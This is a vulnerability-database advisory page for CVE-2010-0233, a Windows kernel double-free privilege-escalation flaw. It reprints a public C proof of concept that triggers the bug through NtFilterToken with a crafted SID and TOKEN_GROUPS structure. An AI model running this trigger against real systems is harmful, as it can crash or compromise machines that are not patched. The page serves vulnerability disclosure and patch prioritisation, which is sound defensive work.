CVE-2010-0233
high
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
8.2
Description
Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application, aka "Windows Kernel Double Free Vulnerability."
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Microsoft Windows XP/Vista/2000/2003 - Double-Free Memory Corruption Privilege Escalation
// source: https://www.securityfocus.com/bid/38044/info
// Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel.
// An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service.
// --------------------------------------------------------
// Windows NtFilterToken() Double Free Vulnerability
// ----------------------------- taviso@sdf.lonestar.org ------------
//
// INTRODUCTION
//
// NtFilterToken() will jump to a cleanup routine if it failed to capture
// the arguments specified due to pathological TOKEN_GROUP parameter. This
// cleanup routine assumes a pointer passed to SeCaptureSidAndAttributesArray()
// will be NULL if it fails, and attempts to release it otherwise.
//
// Unfortunately there is a codepath where SeCaptureSidAndAttributesArray()
// allocates a buffer, releases it on error, but then does not set it to
// NULL. This causes NtFilterToken() to incorrectly free it again.
//
// IMPACT
//
// This is probably exploitable (at least on MP kernels) to get ring0 code
// execution, but you would have to get the released buffer re-allocated
// during a very small window and you only get one attempt (the kernel
// will bugcheck if you dont win the race).
//
// Although technically this is a local privilege escalation, I don't think
// it's possible to create a reliable exploit. Therefore, It's probably
// safe to treat this as if it were a denial of service.
//
// Interestingly, Microsoft are big proponents of static analysis and this
// seems like a model example of a statically discoverable bug. I would
// guess they're dissapointed they missed this one, it would be fun to
// know what went wrong.
//
// This vulnerability was reported to Microsoft in October, 2009.
//
// CREDIT
//
// This bug was discovered by Tavis Ormandy <taviso@sdf.lonestar.org>.
//
#include <windows.h>
PVOID AllocBufferOnPageBoundary(ULONG Size);
int main(int argc, char **argv)
{
SID *Sid;
HANDLE NewToken;
FARPROC NtFilterToken;
PTOKEN_GROUPS Restricted;
// Resolve the required routine.
NtFilterToken = GetProcAddress(GetModuleHandle("NTDLL"), "NtFilterToken");
// Allocate SID such that touching the following byte will AV.
Sid = AllocBufferOnPageBoundary(sizeof(SID));
Restricted = AllocBufferOnPageBoundary(sizeof(PTOKEN_GROUPS) + sizeof(SID_AND_ATTRIBUTES));
// Setup SID, SubAuthorityCount is the important field.
Sid->Revision = SID_REVISION;
Sid->SubAuthority[0] = SECURITY_NULL_RID;
Sid->SubAuthorityCount = 2;
// Respect my authority.
CopyMemory(Sid->IdentifierAuthority.Value, "taviso", sizeof Sid->IdentifierAuthority.Value);
// Setup the TOKEN_GROUPS structure.
Restricted->Groups[0].Attributes = SE_GROUP_MANDATORY;
Restricted->Groups[0].Sid = Sid;
Restricted->GroupCount = 1;
// Trigger the vulnerabilty.
NtFilterToken(INVALID_HANDLE_VALUE,
0,
NULL,
NULL,
Restricted,
&NewToken);
// Not reached
return 0;
}
#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif
// This is a quick routine to allocate a buffer on a page boundary. Simply
// VirtualAlloc() two consecutive pages read/write, then use VirtualProtect()
// to set the second page to PAGE_NOACCESS.
//
// sizeof(buffer)
// |
// <-+->
// +----------------+----------------+
// | PAGE_READWRITE | PAGE_NOACCESS |
// +----------------+----------------+
// ^ ^
// | |
// buffer[0] -+ +- buffer[size]
//
// No error checking for simplicity, whatever :-)
//
PVOID AllocBufferOnPageBoundary(ULONG Size)
{
ULONG GuardBufSize;
ULONG ProtBits;
PBYTE GuardBuf;
// Round size requested up to the next multiple of PAGE_SIZE
GuardBufSize = (Size + (PAGE_SIZE - 1)) & ~(PAGE_SIZE - 1);
// Add one page to be the guard page
GuardBufSize = GuardBufSize + PAGE_SIZE;
// Map this anonymous memory
GuardBuf = VirtualAlloc(NULL,
GuardBufSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
// Make the final page NOACCESS
VirtualProtect(GuardBuf + GuardBufSize - PAGE_SIZE,
PAGE_SIZE,
PAGE_NOACCESS,
&ProtBits);
// Calculate where pointer should be, so that touching Buffer[Size] AVs.
return GuardBuf + GuardBufSize - PAGE_SIZE - Size;
}OS impact
Windows Affected 5 releases
| Version | Status | Fixed in |
|---|---|---|
| sp3 | Affected | โ |
| sp2 | Affected | โ |
| sp1 | Affected | โ |
| - | Affected | โ |
| โ | Affected | โ |
References
- http://www.us-cert.gov/cas/techalerts/TA10-040A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-015
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8392
- http://www.us-cert.gov/cas/techalerts/TA10-040A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-015
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8392
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.